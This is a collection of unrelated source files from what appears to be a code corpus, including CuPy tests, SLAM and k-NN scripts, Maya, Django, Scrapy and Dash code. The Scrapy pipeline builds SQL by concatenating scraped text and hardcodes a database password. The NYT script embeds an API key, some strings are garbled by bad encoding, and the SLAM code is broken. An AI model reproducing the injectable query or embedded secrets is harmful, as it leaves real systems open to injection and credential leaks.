data[chan,:])[int(sfreq-sfreq/2):int(sfreq+sfreq/2)] # mode="full"
return filtered
|
12,958 | 963ce771abfe1606a70cdb66132ea33a86e790e7 | import unittest
import cupy
from cupy import testing
import cupyx.scipy.linalg
import numpy
import pytest
try:
import scipy.linalg
_scipy_available = True
except ImportError:
_scipy_available = False
@testing.parameterize(*testing.product({
'trans': [0, 1, 2, 'N', 'T', 'C'],
'lower': [True, False],
'unit_diagonal': [True, False],
'overwrite_b': [True, False],
'check_finite': [True, False],
}))
@testing.with_requires('scipy')
class TestSolveTriangular(unittest.TestCase):
@testing.for_dtypes('fdFD')
def check_x(self, a_shape, b_shape, dtype):
a_cpu = numpy.random.randint(1, 10, size=a_shape).astype(dtype)
b_cpu = numpy.random.randint(1, 10, size=b_shape).astype(dtype)
a_cpu = numpy.tril(a_cpu)
if self.lower is False:
a_cpu = a_cpu.T
if self.unit_diagonal is True:
numpy.fill_diagonal(a_cpu, 1)
a_gpu = cupy.asarray(a_cpu)
b_gpu = cupy.asarray(b_cpu)
a_gpu_copy = a_gpu.copy()
b_gpu_copy = b_gpu.copy()
result_cpu = scipy.linalg.solve_triangular(
a_cpu, b_cpu, trans=self.trans, lower=self.lower,
unit_diagonal=self.unit_diagonal, overwrite_b=self.overwrite_b,
check_finite=self.check_finite)
result_gpu = cupyx.scipy.linalg.solve_triangular(
a_gpu, b_gpu, trans=self.trans, lower=self.lower,
unit_diagonal=self.unit_diagonal, overwrite_b=self.overwrite_b,
check_finite=self.check_finite)
assert result_cpu.dtype == result_gpu.dtype
cupy.testing.assert_allclose(result_cpu, result_gpu, atol=1e-3)
cupy.testing.assert_array_equal(a_gpu_copy, a_gpu)
if not self.overwrite_b:
cupy.testing.assert_array_equal(b_gpu_copy, b_gpu)
def test_solve(self):
self.check_x((4, 4), (4,))
self.check_x((5, 5), (5, 2))
self.check_x((5, 5), (5, 5))
def check_shape(self, a_shape, b_shape):
for xp, sp in ((numpy, scipy), (cupy, cupyx.scipy)):
a = xp.random.rand(*a_shape)
b = xp.random.rand(*b_shape)
with pytest.raises(ValueError):
sp.linalg.solve_triangular(
a, b, trans=self.trans, lower=self.lower,
unit_diagonal=self.unit_diagonal,
overwrite_b=self.overwrite_b,
check_finite=self.check_finite)
def test_invalid_shape(self):
self.check_shape((2, 3), (4,))
self.check_shape((3, 3), (2,))
self.check_shape((3, 3), (2, 2))
self.check_shape((3, 3, 4), (3,))
def check_infinite(self, a_shape, b_shape):
for xp, sp in ((numpy, scipy), (cupy, cupyx.scipy)):
a = xp.random.rand(*a_shape)
b = xp.random.rand(*b_shape)
a[(0,) * a.ndim] = numpy.inf
b[(0,) * b.ndim] = numpy.inf
with pytest.raises(ValueError):
sp.linalg.solve_triangular(
a, b, trans=self.trans, lower=self.lower,
unit_diagonal=self.unit_diagonal,
overwrite_b=self.overwrite_b,
check_finite=self.check_finite)
def test_infinite(self):
if self.check_finite:
self.check_infinite((4, 4), (4,))
self.check_infinite((5, 5), (5, 2))
self.check_infinite((5, 5), (5, 5))
|
12,959 | 4641a3c68702f4da7273baca991f6f692b6399e4 | import numpy as np
# import cov_matrix
from landmarks import get_DB, get_DB_size
DBSize = get_DB_size()
landmarkDB = get_DB()
landmarks = landmarkDB[:DBSize]
C = 1.0 # const for gaussin sample
c = 0.01
d = 1.0
V = np.matrix([[1, 1], # V is just 2 by 2 identity matrix
[1, 1]],
dtype='float')
A = np.matrix([[1, 0, 0], # jacobian of the prediction model
[0, 1, 0],
[0, 0, 1]],
dtype='float')
H = np.matrix([[0, 0, 0], # jacobian of the measurement model
[0, 0, 0]],
dtype='float')
X = np.matrix([[0], # system state
[0],
[0]],
dtype='float')
P = np.matrix([[0, 0, 0], # default - np.cov(x[:3],x[:3])
[0, 0, 0], # covariance matrix
[0, 0, 0]],
dtype='float')
R = np.matrix([[1, 0],
[0, 1]],
dtype='float')
Jxr = np.matrix([[1, 0, 0],
[0, 1, 0]],
dtype='float')
Jz = np.matrix([[0, 0],
[0, 0]],
dtype='float')
x = y = th = 0
def main(robot_position, dposition, landmarkDB, DBSize):
# A = [[1,0,-dy],[0,1,dx],[0,0,1]] - matrix
#
# Hus = [[(x-lx)/r,(y-ly)/r,0],[(ly-y)/r**2,(lx-x)/r**2,-1]]
# H - matrix
# ---------------------------
# xr|yr|tr|x1|y1|x2|y2|x3|y3|
# ---------------------------
# A |B |C | | |-A|-B| | |
# D |E |F | | |-D|-E| | |
# ---------------------------
# A - (x-lx)/r, B - (y-ly)/r, D - (ly-y)/r**2, E - (lx-x)/r**2
#
# x, y, z
global x, y, th, V, A, H, P, X, c, C, d, R, Jxr, Jz
landmarkDB = landmarkDB[:DBSize]
""" step 1 """
dx = dposition[0]
dy = dposition[1]
dth = dposition[2]
x = robot_position[0]
y = robot_position[1]
th = robot_position[2]
x += dx
y += dy
th += dth
X[0], X[1], X[2] = x, y, th
A[0, 2] = -dy
A[1, 2] = dx
Q = [[C*dth**2, C*dx*dy, C*dx*dth],
[C*C*dy*dx, C*dy**2, C*dy*dth],
[C*dth*dx, C*dth*dy, C*dth**2]]
Prr = P[:3, :3]
Prr = A*Prr*A + Q # top left 3*3 of P
P[:3, :3] = Prr
Pri = P[:3, :]
Pri = A*Pri # top 3 rows of X
P[:3, :] = Pri
Jxr[0, 2] = -dth * np.sin(th)
Jxr[0, 2] = dth * np.cos(th)
Jz = np.matrix([[np.cos(th), -dth*np.cos(th)], # not sure, maybe th+dth
[np.sin(th), dth*np.cos(th)]])
""" step 2 """
for i, landmark in enumerate(landmarks):
lx, ly = landmark.pos
lrange = landmark.range_
lbearing = landmark.bearing
range_ = math.sqrt((lx-x)**2 + (ly-y)**2) + lrange
bearing = math.atan((ly-y) / (lx-x)) - th + lbearing
h = np.matrix([[range_], [bearing]])
H[0][0] = (x-lx) / range_
H[0][1] = (y-ly) / range_
H[1][0] = (y-ly) / bearing**2
H[1][1] = (x-lx) / bearing**2
try:
H[1 + i*2] = -H[0][0] # 3+i*2-1 -1
H[2 + i*2] = -H[0][1] # 3+i*2 -1
H[1 + i*2] = -H[1][0] # check it
H[2 + i*2] = -H[1][1]
except IndexError:
temp = np.matrix([[-H[0][0], -H[0][1]], [-H[1][0], -H[1][1]]])
np.append(H, temp)
r = R[0, 0]
b = R[1, 1]
R = [[r*c, 0], [0, b*d]]
try:
K = P * H.T * (H*P*H.T + V*R*V.T)**(-1)
S = H*P*H.T + V*R*V.T
except np.linalg.linalg.LinAlgError:
print('Nothing to correct')
K = 1
X = X + K*(h) # z-h
""" step 3 """
land_pos = np.matrix([[lx], [ly]], dtype='float')
# first we add the new landmark to the state vector X
X = np.append(X, land_pos, axis=0)
# we add the covariance for the new landmark in the cell C
# P^(N+1,N+1) = Jxr*P*Jxr.T + Jz*R*Jz.T
mass = [] # add the row of covariance to the P
cov_C = np.cov(land_pos, land_pos, rowvar=0) # , ddof=0)
for i, lm in enumerate(landmarkDB):
if i != DBSize:
lm_pos = np.matrix([[lm.pos[0]], [lm.pos[1]]], dtype='float')
cov_F = np.cov(land_pos, lm_pos, rowvar=0)
mass.append(cov_F)
P = np.append(P, mass, axis=0)
column = mass.T
column = np.append(column, cov_C, axis=0)
P = np.append(P, column, axis=0)
return round(X[0, 0], 6), round(X[1, 0], 6), round(X[2, 0], 6)
# round doesn't work
if __name__ == "__main__":
from landmarks import DBSize, landmarkDB
print(main([5, 5, 0.5], [1, 1, 0.1], landmarkDB, DBSize))
|
12,960 | ac846558d704e11460326519576a0e2c035ef8f4 | from .user import User
from .menu import Menu
from .menu_auth_group import MenuAuthGroup
|
12,961 | 3e1c39305c0988ec551c4c91890acc7294b1cd0e | import MapReduce
import sys
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
key = record[1]
mr.emit_intermediate(key,record)
def reducer(key, list_of_values):
head = list_of_values[0]
for pos in range(1,len(list_of_values)):
list = head + list_of_values[pos]
mr.emit(list)
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
|
12,962 | 0242bfe78a60c9d363e8e300f0721418f39ebf87 | import numpy as np
import matplotlib.pyplot as plot
grape = [8, 5]
fish = [2, 3]
carrot = [7, 10]
orange = [7, 3]
celery = [3, 8]
cheese = [1, 1]
category = ['๊ณผ์ผ', '๋จ๋ฐฑ์ง', '์ฑ์', '๊ณผ์ผ', '์ฑ์', '๋จ๋ฐฑ์ง']
# ๋ถ๋ฅ๋์
dan = int(input('๋จ๋ง ์
๋ ฅ(1~10):'))
asac = int(input('์์ญ๊ฑฐ๋ฆผ ์
๋ ฅ(1~10):'))
target = [dan, asac]
def data_set():
dataset = np.array([grape, fish, carrot, orange, celery, cheese]) # ๋ถ๋ฅ์ง๋จ
size = len(dataset)
class_target = np.tile(target, (size, 1)) # ๋ถ๋ฅ๋์
class_category = np.array(category) # ๋ถ๋ฅ๋ฒ์ฃผ
return dataset, class_target, class_category
# dataset ์์ฑ
dataset, class_target, class_categoty = data_set() # data_set()ํจ์ ํธ์ถ
def classify(dataset, class_target, class_categoty, k):
# ์ ํด๋ฆฌ๋ ๊ฑฐ๋ฆฌ ๊ณ์ฐ
diffMat = class_target - dataset # ๋ ์ ์ ์ฐจ
sqDiffMat = diffMat ** 2 # ์ฐจ์ ๋ํ ์ ๊ณฑ
row_sum = sqDiffMat.sum(axis=1) # ์ฐจ์ ๋ํ ์ ๊ณฑ์ ๋ํ ํฉ
distance = np.sqrt(row_sum) # ์ฐจ์ ๋ํ ์ ๊ณฑ์ ๋ํ ํฉ์ ์ ๊ณฑ๊ทผ(์ต์ข
๊ฑฐ๋ฆฌ)
# ๊ฐ๊น์ด ๊ฑฐ๋ฆฌ ์ค๋ฆ์ฐจ์ ์ ๋ ฌ
sortDist = distance.argsort()
# ์ด์ํ k๊ฐ ์ ์
class_result = {}
for i in range(k):
c = class_categoty[sortDist[i]]
class_result[c] = class_result.get(c, 0) + 1
return class_result
# ํจ์ ํธ์ถ
k = int(input('k๊ฐ ์
๋ ฅ(1~3):'))
class_result = classify(dataset, class_target, class_categoty, k) # classify()ํจ์ํธ์ถ
print(class_result)
# ๋ถ๋ฅ๊ฒฐ๊ณผ ์ถ๋ ฅ ํจ์ ์ ์
def classify_result(class_result):
protein = fruit = vegetable = 0
for c in class_result.keys():
if c == '๋จ๋ฐฑ์ง':
protein = class_result[c]
elif c == '๊ณผ์ผ':
fruit = class_result[c]
else:
vegetable = class_result[c]
if protein > fruit and protein > vegetable:
result = "๋ถ๋ฅ๋์์ ๋จ๋ฐฑ์ง ์
๋๋ค."
elif fruit > protein and fruit > vegetable:
result = "๋ถ๋ฅ๋์์ ๊ณผ์ผ ์
๋๋ค"
else:
result = "๋ถ๋ฅ๋์์ ์ฑ์ ์
๋๋ค."
return result
a = classify_result(class_result)
print(a) |
12,963 | ada618dcac4e4e7691dd37c2131e2ce40c32779a | import time
import matplotlib.pyplot as plt
from math import pi, sin, cos
class VirtualStepper:
"""
A visualization of a stepper motor for use in remote learning workshops where not everyone has access to stepper motors.
"""
count = 0
def __init__(self, name = None, n_steps = 256, delay = 1e-3):
"""
Since virtual steppers are virtual, we don't need pins or step sequences. We're still using delay and n_steps to resemble physical steppers.
"""
self.fig, self.ax = plt.subplots(figsize=(3, 3))
self.n_steps = n_steps
self.delay = delay
self.step_size = 2 * pi / self.n_steps
if name is None:
self.name = 'Stepper {}'.format(VirtualStepper.count + 1)
self.angle = 0.0
self.check()
self.inv = False
VirtualStepper.count += 1
plt.ion()
plt.show()
self.draw()
def draw(self):
self.ax.cla()
self.ax.set_title('{}: Angle = {:.2f}$\pi$'.format(self.name, self.angle % (2*pi) / pi))
self.ax.set_xlim(-1, 1)
self.ax.set_ylim(-1, 1)
self.ax.arrow(0, 0, cos(self.angle), sin(self.angle), length_includes_head = True, head_length = 0.3, head_width = 0.1)
self.fig.canvas.draw()
plt.pause(1e-3)
def reverse(self):
self.inv = True
def unreverse(self):
self.inv = False
def rotate_to(self, angle, degrees = False):
"""
Rotates to the angle specified (chooses the direction of minimum rotation)
"""
target = angle * pi / 180 if degrees else angle
curr = self.angle
diff = (target - curr) % (2*pi)
if abs(diff - (2*pi)) < diff:
diff = diff - (2*pi)
self.rotate_by(diff)
def rotate_by(self, angle, degrees = False):
"""
Rotate the stepper by this angle (radians unless specified)
Positive angles rotate clockwise, negative angles rotate counterclockwise
"""
target = angle * pi / 180 if degrees else angle
if self.inv:
target = -target
if target > 0:
n = int(target // self.step_size) + 1
for _ in range(n):
self.step_c()
else:
n = int(-target // self.step_size) + 1
for _ in range(n):
self.step_cc()
if self.inv:
diff = -diff
def zero(self):
"""
Resets the position of the stepper to 0
"""
self.angle = 0.0
self.draw()
time.sleep(self.delay)
def step_c(self):
self.angle += self.step_size
self.angle = self.angle % (2*pi)
self.draw()
time.sleep(self.delay)
def step_cc(self):
self.angle -= self.step_size
self.angle = self.angle % (2*pi)
self.draw()
time.sleep(self.delay)
def check(self):
self.step_c()
self.step_cc()
|
12,964 | 6f8c9e14e8995ba03cf6a3a82c7001b78e89cbdd | '''
========================================================================================================================
Author: Alan Camilo
www.alancamilo.com
Requirements: aTools Package
------------------------------------------------------------------------------------------------------------------------
To install aTools, please follow the instructions in the file how_to_install.txt
------------------------------------------------------------------------------------------------------------------------
To unistall aTools, go to menu (the last button on the right), Uninstall
========================================================================================================================
'''
from maya import cmds
from maya import mel
from aTools.generalTools.aToolsGlobals import aToolsGlobals as G
from aTools.commonMods import uiMod
from aTools.commonMods import utilMod
from aTools.commonMods import animMod
from aTools.commonMods import aToolsMod
import maya.OpenMaya as om
#============================================================================================================
class MicroTransform(object):
utilMod.killScriptJobs("G.microTransformScriptJobs")
def __init__(self):
G.deferredManager.removeFromQueue("MT_blinking")
if G.aToolsBar.microTransform: return
G.aToolsBar.microTransform = self
self.attributes = ['translate', 'translateX','translateY','translateZ','rotate', 'rotateX', 'rotateY', 'rotateZ', 'scale', 'scaleX','scaleY','scaleZ']
self.multiplierValues = [ {"name":"ultraSlow", "value":.05
},{"name":"superSlow", "value":.2
},{"name":"slow", "value":.5
},{"name":"medium", "value":1
}]
self.defaultMultiplier = "slow"
self.microTransformStartTimer = {}
self.microTransformValues = {}
self.onOff = False
self.rotationOrientMode = cmds.manipRotateContext('Rotate', query=True, mode=True)
self.setMultiplier(self.getMultiplier())
self.removeMicroTransform()
self.blinkingButton(self.onOff)
def blinkingButton(self, onOff):
if onOff: G.aToolsBar.timeoutInterval.setInterval(self.toggleButtonActive, .3, id="MT_blinking")
else: G.aToolsBar.timeoutInterval.stopInterval("MT_blinking")
def toggleButtonActive(self):
onOff = "active" in cmds.iconTextButton("microTransformBtn", query=True, image=True)
self.setButtonImg(not onOff)
def setButtonImg(self, onOff):
if onOff:
cmds.iconTextButton("microTransformBtn", edit=True, image=uiMod.getImagePath("specialTools_micro_transform_active"), highlightImage= uiMod.getImagePath("specialTools_micro_transform_active"))
else:
cmds.iconTextButton("microTransformBtn", edit=True, image=uiMod.getImagePath("specialTools_micro_transform"), highlightImage= uiMod.getImagePath("specialTools_micro_transform copy"))
def switch(self):
self.onOff = (not self.onOff)
self.setButtonImg(self.onOff)
self.blinkingButton(self.onOff)
self.setMode(self.onOff)
def setMode(self, onOff):
utilMod.killScriptJobs("G.microTransformScriptJobs")
if onOff:
self.rotationOrientMode = cmds.manipRotateContext('Rotate', query=True, mode=True)
cmds.manipRotateContext('Rotate', edit=True, mode=2)#gimbal
#update values on turning on
self.addMicroTransform()
G.microTransformScriptJobs = []
# get the current selected object values
G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('SelectionChanged', self.addMicroTransform )))
G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('timeChanged', self.updateValues )))
G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('Undo', self.updateValues )))
G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('Redo', self.updateValues )))
G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('DragRelease', self.release )))
#print "microTransform is ON."
else:
cmds.manipRotateContext('Rotate', edit=True, mode=self.rotationOrientMode)
self.removeMicroTransform()
#print "microTransform is OFF."
def changedMicroTransform(self, msg, mplug, otherMplug, clientData):
#cmds.undoInfo(stateWithoutFlush=False)
if om.MNodeMessage.kAttributeSet == (om.MNodeMessage.kAttributeSet & msg) and not om.MGlobal.isUndoing() and not om.MGlobal.isRedoing():
nodeName, attrName = mplug.name().split('.')
#print "changed!"
if attrName not in self.attributes: return
nodeAttr = mplug.name()
val = cmds.getAttr(nodeAttr)
mtValue = self.microTransformValues["%s_%s"%(nodeName, attrName)]
if str(val) != str(mtValue):
#timer
if not self.microTransformStartTimer.has_key("%s"%nodeName):
self.microTransformStartTimer["%s"%nodeName] = cmds.timerX()
microTransformTimer = cmds.timerX(startTime=self.microTransformStartTimer["%s"%nodeName])
self.microTransformStartTimer["%s"%nodeName] = cmds.timerX()
microTransformTimer *= 50
if microTransformTimer == 0: microTransformTimer = 1000
mult = self.multiplier/microTransformTimer
if mult >= self.multiplier: mult = self.multiplier
self.undoChunkFn("open")
#print "changedMicroTransform"
if type(val) is list:
temp = ()
for n, loopVal in enumerate(val[0]):
dif = loopVal-mtValue[0][n]
temp = temp + (mtValue[0][n]+(dif*mult),)
newVal = [temp]
self.microTransformValues["%s_%s"%(nodeName, attrName)] = newVal
#xyz
self.microTransformValues["%s_%sX"%(nodeName, attrName)] = newVal[0][0]
self.microTransformValues["%s_%sY"%(nodeName, attrName)] = newVal[0][1]
self.microTransformValues["%s_%sZ"%(nodeName, attrName)] = newVal[0][2]
eval("cmds.setAttr(nodeAttr, %s,%s,%s)"%(newVal[0][0],newVal[0][1],newVal[0][2]))
#xyz
cmds.setAttr("%sX"%nodeAttr, newVal[0][0])
cmds.setAttr("%sY"%nodeAttr, newVal[0][1])
cmds.setAttr("%sZ"%nodeAttr, newVal[0][2])
else:
dif = val-mtValue
newVal = mtValue+(dif*mult)
self.microTransformValues["%s_%s"%(nodeName, attrName)] = newVal
#xyz inverse
val = cmds.getAttr("%s.%s"%(nodeName, attrName[:-1]))
self.microTransformValues["%s_%s"%(nodeName, attrName[:-1])] = val
cmds.setAttr(nodeAttr, newVal)
else:
self.microTransformValues["%s_%s"%(nodeName, attrName)] = cmds.getAttr(nodeAttr)
if type(val) is list:
valX = cmds.getAttr("%s.%sX"%(nodeName, attrName))
valY = cmds.getAttr("%s.%sY"%(nodeName, attrName))
valZ = cmds.getAttr("%s.%sZ"%(nodeName, attrName))
#xyz
self.microTransformValues["%s_%sX"%(nodeName, attrName)] = valX
self.microTransformValues["%s_%sY"%(nodeName, attrName)] = valY
self.microTransformValues["%s_%sZ"%(nodeName, attrName)] = valZ
else:
#xyz inverse
val = cmds.getAttr("%s.%s"%(nodeName, attrName[:-1]))
self.microTransformValues["%s_%s"%(nodeName, attrName[:-1])] = val
#cmds.undoInfo(stateWithoutFlush=True)
def release(self):
self.undoChunkFn("close")
self.updateValues()
self.microTransformStartTimer = {}
def undoChunkFn(self, openClose):
if openClose == "open":
if self.undoChunk == "closed":
cmds.undoInfo(openChunk=True)
cmds.undoInfo(closeChunk=True)
cmds.undoInfo(openChunk=True)
cmds.undoInfo(closeChunk=True)
cmds.undoInfo(openChunk=True)
cmds.undoInfo(closeChunk=True)
cmds.undoInfo(openChunk=True)
self.undoChunk = "open"
#print "openChunk"
else:
if self.undoChunk == "open":
cmds.undoInfo(closeChunk=True)
self.undoChunk = "closed"
#print "closeChunk"
def addMicroTransform(self):
self.updateValues()
cmds.undoInfo(stateWithoutFlush=False)
sel = cmds.ls(selection=True)
if G.MT_lastSel:
graphEditorFocus = cmds.getPanel(withFocus=True) == "graphEditor1"
if sel == G.MT_lastSel and graphEditorFocus:
cmds.undoInfo(stateWithoutFlush=True)
return
G.MT_lastSel = sel
if len(sel) <= 0:
cmds.undoInfo(stateWithoutFlush=True)
return
self.removeMicroTransform()
G.microTransformIds = []
self.undoChunk = "closed"
MSelectionList = om.MSelectionList()
om.MGlobal.getActiveSelectionList(MSelectionList)
node = om.MObject()
for n, loopSel in enumerate(sel):
MSelectionList.getDependNode(n, node)
clientData = None
G.microTransformIds.append(om.MNodeMessage.addAttributeChangedCallback(node, self.changedMicroTransform, clientData))
cmds.undoInfo(stateWithoutFlush=True)
def removeMicroTransform(self):
try:
for loopId in G.microTransformIds:
om.MNodeMessage.removeCallback(loopId)
except: pass
G.microTransformIds = None
def updateValues(self):
#print "updateValues"
self.microTransformValues = {}
sel = cmds.ls(selection=True)
for loopSel in sel:
for loopAttr in self.attributes:
val = cmds.getAttr("%s.%s"%(loopSel, loopAttr))
self.microTransformValues["%s_%s"%(loopSel, loopAttr)] = val
def setMultiplier(self, option):
name = None
for loopOption in self.multiplierValues:
if loopOption["name"] == option:
value = loopOption["value"]
name = loopOption["name"]
if not name: #in case file is corrupt
self.setMultiplier(self.defaultMultiplier)
return
self.multiplier = value
aToolsMod.saveInfoWithUser("userPrefs", "microTransform", name)
def getMultiplier(self):
name = aToolsMod.loadInfoWithUser("userPrefs", "microTransform")
if name == None: name = self.defaultMultiplier
return name
def popupMenu(self, *args):
menu = cmds.popupMenu()
cmds.popupMenu(menu, edit=True, postMenuCommand=self.populateMenu, postMenuCommandOnce=True)
def populateMenu(self, menu, *args):
cmds.radioMenuItemCollection(parent=menu)
for loopOption in self.multiplierValues:
radioSelected = (self.multiplier == loopOption["value"])
option = loopOption["name"]
cmds.menuItem (label=utilMod.toTitle(loopOption["name"]), radioButton=radioSelected, command=lambda x, option=option, *args: self.setMultiplier(option), parent=menu)
|
12,965 | c26a7a035a42f0bd365021df03d4f32097818698 | from django.apps import AppConfig
class SqueryConfig(AppConfig):
name = 'squery'
|
12,966 | d9992011a3b48f77f3df250c79f327759c7c8ddd | import pandas as pd
import numpy as np
import plotly.graph_objs as go
import plotly.express as px
import plotly.colors
from collections import OrderedDict
import requests
from pynytimes import NYTAPI
import datetime
def return_figures():
""" Creates four plotly visualizations using the New York Times Archive API
Returns:
list (dict): list containing the four plotly visualizations
"""
# Add New York Times API Key
nyt = NYTAPI("AsjeHhqDYrePA2GMPpYoY1KAKAdG7P99")
# Select Year and Month of articles
data = nyt.archive_metadata(
date = datetime.datetime(2020, 7, 1)
)
def data_to_df(data):
# Initiate list for restructured information
data_list = []
# Collect Data from API dictionary
for article in data:
new_data = [article.get("section_name"),
article.get("news_desk"),
article.get("pub_date"),
article.get("headline").get("main"),
article.get("abstract"),
article.get("lead_paragraph"),
article.get("type_of_material"),
article.get("word_count")]
# Append list of information from article to data list
data_list.append(new_data)
# Convert data list to DataFrame
df = pd.DataFrame(data_list, columns=["section_name","news_desk", "pub_date", "headline", "abstract", "lead_paragraph", "type_of_material", "word_count"])
return df
df = data_to_df(data)
# first chart plots section distribution
# as a pie chart
graph_one = []
df_one = df.copy()
# filter and sort values for the visualization
# filtering plots the articles in decreasing order by their values
labels = df_one.section_name.value_counts().index
values = df_one.section_name.value_counts().values
graph_one.append(
go.Pie(
labels=labels,
values=values,
hole=.6,
textposition="inside"
)
)
layout_one = dict(title = 'Distribution of sections of this months New York Times articles')
# second chart plots section distribution
# as a pie chart
graph_two = []
df_two = df.copy()
# filter and sort values for the visualization
# filtering plots the articles in decreasing order by their values
labels = df_two.news_desk.value_counts().index
values = df_two.news_desk.value_counts().values
graph_two.append(
go.Pie(
labels=labels,
values=values,
hole=.6,
textposition="inside"
)
)
layout_two = dict(title = 'Distribution of news desk of this months articles')
# third chart plots section distribution
# as a pie chart
graph_three = []
df_three = df.copy()
# filter and sort values for the visualization
# filtering plots the articles in decreasing order by their values
labels = df_three.type_of_material.value_counts().index
values = df_three.type_of_material.value_counts().values
graph_three.append(
go.Pie(
labels=labels,
values=values,
hole=.6,
textposition="inside"
)
)
layout_three = dict(title = 'Distribution for type of material of this months articles')
# fourth chart plots section distribution
# as a pie chart
graph_four = []
# Convert publishing date columns to datetime format
df["pub_date"] = pd.to_datetime(df["pub_date"]).dt.date
df_four = df.copy()
df_four = df_four.pub_date.value_counts().to_frame().sort_index()
# filter and sort values for the visualization
# filtering plots the articles in decreasing order by their values
x_val = df_four.index
y_val = df_four.values
graph_four.append(
go.Scatter(
x=df_four.index,
y=df_four["pub_date"],
mode="lines",
name="Articles"
)
)
layout_four = dict(title = 'Number of articles published by days')
# fourth chart plots section distribution
# as a pie chart
graph_five = []
# Calculate average number of words for this months articles
avg_word_count = round(df.word_count.mean(),0)
graph_five.append(
go.Table(
header=dict(values=['Average Word Count']),
cells=dict(values=[avg_word_count])
)
)
layout_five = dict(title = '')
# append all charts
figures = []
figures.append(dict(data=graph_one, layout=layout_one))
figures.append(dict(data=graph_two, layout=layout_two))
figures.append(dict(data=graph_three, layout=layout_three))
figures.append(dict(data=graph_four, layout=layout_four))
figures.append(dict(data=graph_five, layout=layout_five))
return figures
|
12,967 | 32ee73ee7fee4be1fab6eeec997c167d6b8ce600 | # Generated by Django 3.1 on 2020-09-25 19:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='property',
name='tenant',
),
migrations.AddField(
model_name='tenant',
name='rental_property',
field=models.OneToOneField(
default=15, on_delete=django.db.models.deletion.CASCADE, to='app.property'),
preserve_default=False,
),
]
|
12,968 | 1050757987f91753e3c34baf4b04993958adfae6 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
import logging
from scrapy import log
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
class DangdangpcPipeline(object):
def __init__(self):
conn = MySQLdb.connect(
host='127.0.0.1',
port=3306,
user='root',
passwd='panli',
db='db_dangdang_re',
charset='utf8'
)
self.conn = conn
def process_item(self, item, spider):
try:
self.conn.ping()
except:
self.conn.ping(True)
cur = self.conn.cursor()
sql = " insert into pc_infor(name,comment_num,url,price,img_url) values ('"\
+ str(item['title'][0]) + "', '"\
+ str(item['comment_num'][0])+"', '"\
+ str(item['link'])+"', '"\
+ str(item['price'][0])+"', '"\
+ str(item['img_url'][0])+"')"
try:
cur.execute(sql)
self.conn.commit()
except Exception, e:
log.msg("mysql error " + str(e), _level=logging.ERROR)
cur.close()
name = item['title'][0]
price = item['price'][0]
comment_num = item['comment_num'][0]
url = item['link']
img_url = item['img_url'][0]
print u'ๅๅๅ็งฐ:'+name
print u'ๅๅ่ฏ่ฎบ:'+comment_num
print u'ๅๅไปทๆ ผ:'+price
print u'ๅๅ้พๆฅ:'+url
print u'ๅๅๅพ็:'+img_url
print '--------------------------------'
return item
def __del__(self):
self.conn.close() |
12,969 | 1c34ace6cb5e4c751c7b56f30e8f47c2623b9566 | from train import MailEngineRailcarConsist, DieselRailcarMailUnit
def main(roster_id):
consist = MailEngineRailcarConsist(roster_id=roster_id,
id='mail_rail',
base_numeric_id=3000,
name='Mail Rail',
role='mail_railcar_1',
power=700,
gen=6,
sprites_complete=True,
intro_date_offset=-5) # introduce early by design
consist.add_unit(type=DieselRailcarMailUnit,
weight=37,
chassis='railcar_32px',
tail_light='railcar_32px_2')
return consist
|
12,970 | 232ee8663f7753b3a1bfb95bdb07faec1e229c85 | '''
Description:
Write a function, factory, that takes a number as its parameter and returns another function.
The returned function should take an array of numbers as its parameter, and return an array of those numbers multiplied by the number that was passed into the first function.
In the example below, 5 is the number passed into the first function. So it returns a function that takes an array and multiplies all elements in it by five.
Translations and comments (and upvotes) welcome!
Example
fives = factory(5) # returns a function - fives
my_array = [1, 2, 3]
fives(my_array) # returns [5, 10, 15]
'''
def factory(x):
# Good Luck!
def func(args):
return [i*x for i in args]
return func |
12,971 | ea7d6927a4f4f971c0b34f64cd0b0b31284f3a56 | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
header = dbc.Col(
dcc.Markdown(
'# Process',
className='mb-5',
style={
'textAlign': 'center',
'textDecoration': 'underline'
}
)
)
column1 = dbc.Col(
[
dcc.Markdown(
"""
#### Gathering Data
For this project I got data from the [Bureau of Economic Analysis](https://www.bea.gov/data/economic-accounts/industry).
The data came as 9 different datasets. Each dataset was one economic measure over time. There was data on 91 industries over the 50 states,
plus a few aggregations of regions and the country as a whole.
"""
),
html.Img(src='assets/df_2.png',
className='img-fluid',
),
html.Br(),
html.Br(),
dcc.Markdown(
"""
### Cleaning Data
Cleaning the data turned out to be a bit tricky because each dataset had labeled missing values differently. I was able to find the labels
by noticing the numeric columns had an object datatype and trying to change them to numeric would throw an error. Looking at all the values
in the column, I could find the ones that weren't numbers and replace them with NaNs to be dealt with.
To fill the NaN values, I used the data from the previous or following year as that would represent the closest I could get to the real
value. Using mean or median of the column, a standard practice for filling NaNs would not have worked due to the vastly different sizes
of industries in different places.
#### Wrangling Data
Each dataset had a bunch of descriptive columns. Some, such as GeoName (State) and Description (Industry) were crucial.
Others, like GeoFIPS, Region, and IndustryId were redundant. Component Name and Unit were important but not useful in the current form.
The actual data columns were just named with the year. Since each dataset had this same structure, I needed to rename the data columns so
the information in them would be retained through a merge.
I used the component name information and tacked that on to the year in the column names so each column now had both a year and an economic
component being measured.
"""
),
html.Div(
html.Img(
src='assets/merged_df_example.png',
className='img-fluid',
),
style={'textAlign':'center'}
),
html.Br(),
dcc.Markdown(
"""
At this point I had my single dataset with all the important information preserved but I wasn't done yet.
The data I have is essentially time-series data. The order of the years matters. However that won't be captured by the computer looking
at the data.
